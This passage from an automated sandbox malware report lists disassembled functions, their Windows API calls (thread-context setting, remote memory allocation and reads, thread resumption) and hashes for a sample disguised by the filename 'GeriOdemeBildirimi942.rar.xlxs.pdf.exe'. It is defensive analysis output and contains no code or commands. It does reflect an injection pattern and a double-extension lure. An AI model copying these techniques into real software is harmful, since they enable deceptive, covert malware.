Instruction ID: c0da38bb5bb0706e648d3ad10ccfdf749b910b0ab961de1985d7d8fedcd86fe1
Opcode Fuzzy Hash: 21e8ae3d44fcd62c7a10a141161fe8c9a7aa7c36d191888730716db1b5380fd8
Instruction Fuzzy Hash: F22126B1D003499FDB10DFAAC885BDEBBF5FF48310F10842AE959A7240CB799945CBA0

Function 09CC997B Relevance: 1.6, APIs: 1, Instructions: 66
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 09CC99FE

Memory Dump Source

Source File: 00000001.00000002.1369647981.0000000009CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_9cc0000_GeriOdemeBildirimi942.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 0bb6adce89a22361e2d4ebdfeaf60be21854a46a5e4d23a3cfa7993ac10c7ad1
Instruction ID: 76c5406ee0d2c1cd1dbc4af3a7b8775a4e189b6c672883cdd20a3a1530e2bbdb
Opcode Fuzzy Hash: 0bb6adce89a22361e2d4ebdfeaf60be21854a46a5e4d23a3cfa7993ac10c7ad1
Instruction Fuzzy Hash: 782125B5D003098FDB10DFAAC485BAEBBF4EF48320F14842ED459A7241CB789A45CFA1

Function 09CCA03B Relevance: 1.6, APIs: 1, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 09CCA0C0

Memory Dump Source

Source File: 00000001.00000002.1369647981.0000000009CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_9cc0000_GeriOdemeBildirimi942.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 17b64b4168a4e61b236529b641cf55f6b04331cb3faf44734d1ed4c13d2076b2
Instruction ID: 66d9bcd824dc75fccdb5625d42db677be39a96dda05aa9e0b861c4b4ae3db6aa
Opcode Fuzzy Hash: 17b64b4168a4e61b236529b641cf55f6b04331cb3faf44734d1ed4c13d2076b2
Instruction Fuzzy Hash: CF2113B1C003099FDB20DFA9C845BEEBBF1BF48310F50842AE919A3240C7399941DB60

Function 010AD6A9 Relevance: 1.6, APIs: 1, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 010AD737

Memory Dump Source

Source File: 00000001.00000002.1358269074.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_10a0000_GeriOdemeBildirimi942.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: acd879fd52e0d04193d31076dc9029de68c970704b4530de5ba53381674de452
Instruction ID: daaa8c3c791c133dc670458e48cee25fdb2da4af8b1f2be1c250b9b4b47586ff
Opcode Fuzzy Hash: acd879fd52e0d04193d31076dc9029de68c970704b4530de5ba53381674de452
Instruction Fuzzy Hash: C02103B5D002489FDB10CF9AD884AEEBFF5FB48310F50802AE958A3310D378A941CF64

Function 09CC9980 Relevance: 1.6, APIs: 1, Instructions: 63
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 09CC99FE

Memory Dump Source

Source File: 00000001.00000002.1369647981.0000000009CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_9cc0000_GeriOdemeBildirimi942.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 82a1720acc72a038915b57052b723c2869233552a3c5d975d899a805f2482332
Instruction ID: ca89da623cdd80cc6e52bea63d1ea1d827e67a51e0309d1375829affc7301e5c
Opcode Fuzzy Hash: 82a1720acc72a038915b57052b723c2869233552a3c5d975d899a805f2482332
Instruction Fuzzy Hash: 432137B1D003098FDB10DFAAC485BAEBBF4AB48320F14842ED459A7241CB789A45CFA0

Function 09CCA040 Relevance: 1.6, APIs: 1, Instructions: 63
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 09CCA0C0

Memory Dump Source

Source File: 00000001.00000002.1369647981.0000000009CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_9cc0000_GeriOdemeBildirimi942.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 4cbe60b3836a34afc32bdfacd382d71f595459bfd475cdf68a0cd6a9d137417d
Instruction ID: a34b5cfea7e156b16faa992ae173b706d708647d3908f3d8b1f18c44da99aa4b
Opcode Fuzzy Hash: 4cbe60b3836a34afc32bdfacd382d71f595459bfd475cdf68a0cd6a9d137417d
Instruction Fuzzy Hash: A72116B1C003499FDB10DFAAC845BEEBBF5FF48310F50842AE959A7240C7799941DBA1

Function 010AD6B0 Relevance: 1.6, APIs: 1, Instructions: 62
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 010AD737

Memory Dump Source

Source File: 00000001.00000002.1358269074.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_10a0000_GeriOdemeBildirimi942.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 2471128a61d4fcd66cbdd515433a18dd857cd6814569f812d34b22b42bfc7b8f
Instruction ID: 9400779262876ea98a91e4cdf6f4e0d7e008982abd644ec83f79fd0ac71e6b78
Opcode Fuzzy Hash: 2471128a61d4fcd66cbdd515433a18dd857cd6814569f812d34b22b42bfc7b8f
Instruction Fuzzy Hash: DD21E3B5D002489FDB10CF9AD884ADEBFF5FB48310F14801AE954A3250D379A945CF60

Function 09CC9E8B Relevance: 1.6, APIs: 1, Instructions: 53
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 09CC9EFE

Memory Dump Source

Source File: 00000001.00000002.1369647981.0000000009CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_9cc0000_GeriOdemeBildirimi942.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: add5fe1cfaacc21b0d44e3c17bbc05fb28c65ab131768d5784f2f14bc4359c91
Instruction ID: d524dff72aa686ae2c2aa7b5bf5f131eb147cb069dcbbbaeb14c20577990848e
Opcode Fuzzy Hash: add5fe1cfaacc21b0d44e3c17bbc05fb28c65ab131768d5784f2f14bc4359c91
Instruction Fuzzy Hash: 2E111471D003499FDB20DFAAD845BEEBFF5AB88324F14841AE955A7250CB359941CBA0

Function 09CC9E90 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 09CC9EFE

Memory Dump Source

Source File: 00000001.00000002.1369647981.0000000009CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_9cc0000_GeriOdemeBildirimi942.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 261c1e6d613de83d16b41e3de1e1f03f99493c51a84d01dde545506a4e17967e
Instruction ID: 002e103cb94cabc7fc0cb620f09044033f42588e79e113de4b6c2d9992a0d76d
Opcode Fuzzy Hash: 261c1e6d613de83d16b41e3de1e1f03f99493c51a84d01dde545506a4e17967e
Instruction Fuzzy Hash: BE112671C003499FDB20DFAAD845BDEBFF5EB48320F14841AE555A7250CB75A941CFA0

Function 09CC98CB Relevance: 1.6, APIs: 1, Instructions: 50threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNEL32 ref: 09CC9932

Memory Dump Source

Source File: 00000001.00000002.1369647981.0000000009CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_9cc0000_GeriOdemeBildirimi942.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: fd2d104e15217d1b1250eeef1dece0f1875fd14c0b925b3ea03ccf61d2015aae
Instruction ID: f7a47f5779d1a6d8e15813da2660f60455aec7f922bd349f54670f484b42ef78
Opcode Fuzzy Hash: fd2d104e15217d1b1250eeef1dece0f1875fd14c0b925b3ea03ccf61d2015aae
Instruction Fuzzy Hash: 951134B1D003498FDB24DFAAD4457EEBFF5AB88320F24841AD459A7240CB39A941CF94

Function 09CC98D0 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNEL32 ref: 09CC9932

Memory Dump Source

Source File: 00000001.00000002.1369647981.0000000009CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_9cc0000_GeriOdemeBildirimi942.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: beecc9d93756d91ea10d011252aeb1433c968c3d20176266dcde163792f09a4b
Instruction ID: 2fcd15ce1c21da501f8745f8997f87d09a1d9ce0679db963a12cd89c8dddf0ea
Opcode Fuzzy Hash: beecc9d93756d91ea10d011252aeb1433c968c3d20176266dcde163792f09a4b
Instruction Fuzzy Hash: 891128B1D003498FDB20DFAAD4457EEFBF5AB48320F14841AD559A7240CB79A945CF94

Function 010AAFB3 Relevance: 1.5, APIs: 1, Instructions: 48COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000), ref: 010AB01E

Memory Dump Source

Source File: 00000001.00000002.1358269074.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_10a0000_GeriOdemeBildirimi942.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: bc4c4ee4fe7afbe7a40052748a35923be437e298fa4769a9ca567cd38b3efafd
Instruction ID: 8d8725d2779d79af1917500d100bc10bd56af8101f9ea3debdc8fe296fc29ac9
Opcode Fuzzy Hash: bc4c4ee4fe7afbe7a40052748a35923be437e298fa4769a9ca567cd38b3efafd
Instruction Fuzzy Hash: 5E11F0B5C002498FDB20DFAAD444BDEFFF5AF88224F14845AD569A7201D379A546CFA0

Function 09CCAF2C Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,?), ref: 09CCE4BD

Memory Dump Source

Source File: 00000001.00000002.1369647981.0000000009CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_9cc0000_GeriOdemeBildirimi942.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: a891c99d1d86e1030507c13c1a3186daf1e0dae4e5c5621c4a3291e23407dddd
Instruction ID: a9aea4eba6ba456fecf116dc307e36d4b4e2ea54165f93348b99ffb4d68553e2
Opcode Fuzzy Hash: a891c99d1d86e1030507c13c1a3186daf1e0dae4e5c5621c4a3291e23407dddd
Instruction Fuzzy Hash: 1B11F2B58003499FDB20DF9AD885BDEBFF8EB48320F10841AE558A7350C379A944CFA1

Function 09CCE459 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,?), ref: 09CCE4BD

Memory Dump Source

Source File: 00000001.00000002.1369647981.0000000009CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_9cc0000_GeriOdemeBildirimi942.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 9a98cbdccbba4eeea9d6671e6c46f8ed8b00b6cd67298e77017ae3bcdf7fab6e
Instruction ID: 156b43a75ae3d50f1a783c88826dd7ea34126f2239a46fc136c5ff04c78395e7
Opcode Fuzzy Hash: 9a98cbdccbba4eeea9d6671e6c46f8ed8b00b6cd67298e77017ae3bcdf7fab6e
Instruction Fuzzy Hash: EF11F2B5C003499FDB20DF99D845BDEBFF8EB48320F10841AE959A7250C379AA44CFA1

Function 010AAFB8 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000), ref: 010AB01E

Memory Dump Source

Source File: 00000001.00000002.1358269074.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_10a0000_GeriOdemeBildirimi942.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: a3a28eb46a4fc331563c27b3eba32857979b34acf25964f64e85381e6d5b9620
Instruction ID: 66966bc38ec0230e2047fc084ce28c8221cfd24a7967d2426bc52d0c6f4b4e00
Opcode Fuzzy Hash: a3a28eb46a4fc331563c27b3eba32857979b34acf25964f64e85381e6d5b9620
Instruction Fuzzy Hash: 161110B5C003498FDB20DF9AD444BDEFBF4EB88320F10842AD569A7200D379A545CFA1

Function 0102D4C4 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1357610339.000000000102D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0102D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_102d000_GeriOdemeBildirimi942.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a4e0b649c46a4831a0407bb97eba789f0c2946e1fbbb78c7eeb98e2528da15d4
Instruction ID: 346b616f9fe1cc81244bbac5d3137837d404f6099b97f2a8b288a04f1ffecc4c
Opcode Fuzzy Hash: a4e0b649c46a4831a0407bb97eba789f0c2946e1fbbb78c7eeb98e2528da15d4
Instruction Fuzzy Hash: B1213771504250DFDB15DF54D9C0B2ABFA5FB88328F20C6ADE8890F256C376D856CBA2

Function 0102D3D8 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1357610339.000000000102D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0102D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_102d000_GeriOdemeBildirimi942.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fc1563c4ab70ab9ab7d283931c3ccd000a9271268bc743dc39020d224fe7c0b8
Instruction ID: d0942bcd57a9946714e021e8b16a9c0c53e17966e0fdc8a21e00b92b25ab6987
Opcode Fuzzy Hash: fc1563c4ab70ab9ab7d283931c3ccd000a9271268bc743dc39020d224fe7c0b8
Instruction Fuzzy Hash: 66214571604200DFDB05DF44D9C0B5ABFA5FB88324F20C1ADE9490F246C736E846CBA2

Function 0103D1D4 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1357797295.000000000103D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0103D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_103d000_GeriOdemeBildirimi942.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c5e59b3aa5054c731c639baafa574eb3e85f1ea0d78b1291b62d113da1e2daca
Instruction ID: 88c6fdb213bfd28235ef45e4a2ae7570113ba49b6e64545e496153679822b100
Opcode Fuzzy Hash: c5e59b3aa5054c731c639baafa574eb3e85f1ea0d78b1291b62d113da1e2daca
Instruction Fuzzy Hash: 7221F571604200EFDB55DF94D9C0B15BBA9FBD4324F60C5ADE8894B252C736D446CB61

Function 0103D01C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1357797295.000000000103D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0103D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_103d000_GeriOdemeBildirimi942.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 980e3760dbe37e0493e67e30cad996166fca585215879c17ac8153fc3911ebae
Instruction ID: bed27216a4879e9a667086a0e50812ca372a1bbe9181fbe8072b9c73bb2474d9
Opcode Fuzzy Hash: 980e3760dbe37e0493e67e30cad996166fca585215879c17ac8153fc3911ebae
Instruction Fuzzy Hash: BB21FF756042009FDB15DFA4D984B16FBA9EB84614F60C5A9E88A0B286C336D807CB62

Function 0103D006 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1357797295.000000000103D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0103D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_103d000_GeriOdemeBildirimi942.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 735aec0a4daba607c29b35cc8447a2104f04e88e832e9fc3217824867e0a592c
Instruction ID: 19800749cdcef959c0c572ab00323b6130fbfe9da02b2d2459a48fcea4b92ff6
Opcode Fuzzy Hash: 735aec0a4daba607c29b35cc8447a2104f04e88e832e9fc3217824867e0a592c
Instruction Fuzzy Hash: 892183755083809FCB02CF64D994711BFB5EB86314F28C5DAD8898F2A7C33A9816CB62

Function 0102D3D3 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1357610339.000000000102D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0102D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_102d000_GeriOdemeBildirimi942.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 099256442a3ab3004f72329a4e4b6c70090b87d396c4978555b43c732be305a7
Instruction ID: 88466d778ac860926c2f21f264318978010ab2e5a50facf5881b68e794ad024e
Opcode Fuzzy Hash: 099256442a3ab3004f72329a4e4b6c70090b87d396c4978555b43c732be305a7
Instruction Fuzzy Hash: 1A11E176504280CFDB06CF44D9C0B56BFB2FB84324F24C2A9D8490B257C33AE856CBA1

Function 0102D4BF Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1357610339.000000000102D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0102D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_102d000_GeriOdemeBildirimi942.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 099256442a3ab3004f72329a4e4b6c70090b87d396c4978555b43c732be305a7
Instruction ID: d57bef59b6ff759de26f9321247a2f39001ff4621566241d49ce4112fbc696a1
Opcode Fuzzy Hash: 099256442a3ab3004f72329a4e4b6c70090b87d396c4978555b43c732be305a7
Instruction Fuzzy Hash: EB11B176504280CFDB16CF54D5C4B16BFB2FB84324F24C6A9D8494B657C336D856CBA1

Function 0103D1CF Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1357797295.000000000103D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0103D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_103d000_GeriOdemeBildirimi942.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4ccb17c466d2e34b86bde66ac975e9cbefd8e24c09005379d072ef0b40a0d1c0
Instruction ID: 5eca651577b715476e2416f6486eb02c8a1571fb67d4944476760a00aa1ff9f6
Opcode Fuzzy Hash: 4ccb17c466d2e34b86bde66ac975e9cbefd8e24c09005379d072ef0b40a0d1c0
Instruction Fuzzy Hash: 2311BB75504280DFCB06CF54C5C0B15BBA2FB84324F24C6ADD8894B296C33AD40ACB61

Non-executed Functions

Function 09CC07AF Relevance: .3, Instructions: 317COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1369647981.0000000009CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_9cc0000_GeriOdemeBildirimi942.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7df444c6a1873bc1badb1f6f678e37b744372976bc4bf78ab8dffe2a16865f8a
Instruction ID: 882287bd1c58b67d42293a2cd92f80fe349144cfe791abb43c60faf3949d8096
Opcode Fuzzy Hash: 7df444c6a1873bc1badb1f6f678e37b744372976bc4bf78ab8dffe2a16865f8a
Instruction Fuzzy Hash: C1D1E1B4E05219DBCF08CFEAD98069EFFF2BB99340F14D52AD419AB224D73499428F54

Function 09CC07C0 Relevance: .3, Instructions: 313COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1369647981.0000000009CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_9cc0000_GeriOdemeBildirimi942.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5da1213f0d3f57250c0c584233b748ce341a9bcbb4f21d225d699af853cbe757
Instruction ID: ce6a545971f43d093e08523f564c6c1ded49908f1d3986bca523f612268069c8
Opcode Fuzzy Hash: 5da1213f0d3f57250c0c584233b748ce341a9bcbb4f21d225d699af853cbe757
Instruction Fuzzy Hash: BFD1D1B4E05219DBCF08CFEAD98069EFBF2BF99340F14D52AD419AB224D73499428F54

Function 09CC9A58 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1369647981.0000000009CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_9cc0000_GeriOdemeBildirimi942.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b3076a60cc3d1fba2714bebf9ea0ce34517254b814bdb8d90492e8294ebdde6e
Instruction ID: 2d4c65ce6a82900aa94edf5ceb0927509f0aa9abc16b058c355f5ff5b3ce93ef
Opcode Fuzzy Hash: b3076a60cc3d1fba2714bebf9ea0ce34517254b814bdb8d90492e8294ebdde6e
Instruction Fuzzy Hash: 35E1FBB4E002598FDB14DFA9D580AAEFBB2FF89304F248169D415AB356DB30AD41CF61

Function 09CC7A00 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1369647981.0000000009CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_9cc0000_GeriOdemeBildirimi942.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5c2f34f681d1323f6d84d5eae3ac83aecd35a896c293195fd306510758cb3e86
Instruction ID: 26d9efc30bd59339a0a85e92f99c504b5d3b4f735282b0c427323904c349dd20
Opcode Fuzzy Hash: 5c2f34f681d1323f6d84d5eae3ac83aecd35a896c293195fd306510758cb3e86
Instruction Fuzzy Hash: 69E1FBB4E006598FDB14DFA9D5809AEFBB2FF89304F248169D414AB356DB30AD41CF60

Function 09CC7190 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1369647981.0000000009CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_9cc0000_GeriOdemeBildirimi942.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 45b71000f78c35ebc36117aed3e206d32491b12eec8488e44df6b9232d6ef413
Instruction ID: 049ddf154bf689c93024164b23c43c9122a7d474ab20fd03c8bb02073f644dae
Opcode Fuzzy Hash: 45b71000f78c35ebc36117aed3e206d32491b12eec8488e44df6b9232d6ef413
Instruction Fuzzy Hash: 04E1FBB4E006598FDB14DFA9D580AAEFBB2FF89304F248169D454AB356DB30AD41CF60

Function 09CC90A8 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1369647981.0000000009CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_9cc0000_GeriOdemeBildirimi942.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3ac76e919618c8417ac24f5539c4285be5b77109efcb13ca0e0a8e4d61277b26
Instruction ID: decf4a5b66586ef70736202f695032a4417952960d0d6487624ef5053cdfeac5
Opcode Fuzzy Hash: 3ac76e919618c8417ac24f5539c4285be5b77109efcb13ca0e0a8e4d61277b26
Instruction Fuzzy Hash: D0E1EBB4E006598FDB14DFA9D5809AEFBB2FF89304F248269D454AB356DB30AD41CF60

Function 09CC75C8 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1369647981.0000000009CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_9cc0000_GeriOdemeBildirimi942.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ae6c738ec34f5085c362ef4e5b933c025cd36149dbe3f0da582973acc756749d
Instruction ID: 4fbe1badbaa1a9605431e62058e89536058e60c1ca661fee945d4f2630596bda
Opcode Fuzzy Hash: ae6c738ec34f5085c362ef4e5b933c025cd36149dbe3f0da582973acc756749d
Instruction Fuzzy Hash: 66E1D9B4E002598FDB14DFA9D580AAEFBB2FF89304F248169D454AB356DB31AD41CF60

Function 09CC0268 Relevance: .3, Instructions: 275COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1369647981.0000000009CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_9cc0000_GeriOdemeBildirimi942.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8e842f59430407454aebeb0eae08cd8866a5c23eff6fd8f73d69c1b4d55aa08f
Instruction ID: c4e1c573402455192564d0aed9fe0bd5a0666e9acbc4739e2d224c0104060fb3
Opcode Fuzzy Hash: 8e842f59430407454aebeb0eae08cd8866a5c23eff6fd8f73d69c1b4d55aa08f
Instruction Fuzzy Hash: D8B108B1D04629DFDF18CFAAD88159EFBB2FF89340F10952AD415AB264DB349906CF14

Function 09CC0278 Relevance: .3, Instructions: 274COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1369647981.0000000009CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_9cc0000_GeriOdemeBildirimi942.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d01c87edc24071c56875ee18aca6f777808663509d40b73b18eda9641a97d5b7
Instruction ID: ec02ce3e9fa866a0a1a7d2daa7427cf07570e9ac917a86968d09e345356b1bcc
Opcode Fuzzy Hash: d01c87edc24071c56875ee18aca6f777808663509d40b73b18eda9641a97d5b7
Instruction Fuzzy Hash: 44B107B1D04629DFDF18CFAAD98159EFBB2BF89340F10D52AD415AB264DB349902CF44

Function 010AD5DC Relevance: .3, Instructions: 264COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1358269074.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_10a0000_GeriOdemeBildirimi942.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 20a72abad7dca5a4d7282081843cf5dfe7bc7d5b2b9797dde3bd252f5fa1b6f0
Instruction ID: b6bb39972e9c23dd81904eb3e2e29d8ff5f9239d6c3516bd0747769758bf38db
Opcode Fuzzy Hash: 20a72abad7dca5a4d7282081843cf5dfe7bc7d5b2b9797dde3bd252f5fa1b6f0
Instruction Fuzzy Hash: 12A17036E0021A8FCF15DFB5C8805DEBBF2FF85300B5585AAE901AB261DB71E916CB40

Function 09CC6649 Relevance: .1, Instructions: 128COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1369647981.0000000009CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_9cc0000_GeriOdemeBildirimi942.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8b715f94c400c37056dfbc2271e8cc08f7924e265d81d87b860ef4f32898363f
Instruction ID: f833a4bc9aea4356cc64ed67b9d78829de9c8b86e3f6733565df7e3e9647addf
Opcode Fuzzy Hash: 8b715f94c400c37056dfbc2271e8cc08f7924e265d81d87b860ef4f32898363f
Instruction Fuzzy Hash: 5341C0B5D0824A9BCB04CFAAE7545EEFFF9AB89350F04C16EE418A7262D7309545CF41

Analysis Process: GeriOdemeBildirimi942.rar.xlxs.pdf.exePID: 7220, Parent PID: 5648COMMON

Executed Functions

Function 0116A088 Relevance: .9, Instructions: 894COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.3762147900.0000000001160000.00000040.00000800.00020000.00000000.sdmp, Offset: 01160000, based on PE: false

Joe Sandbox IDA Plugin

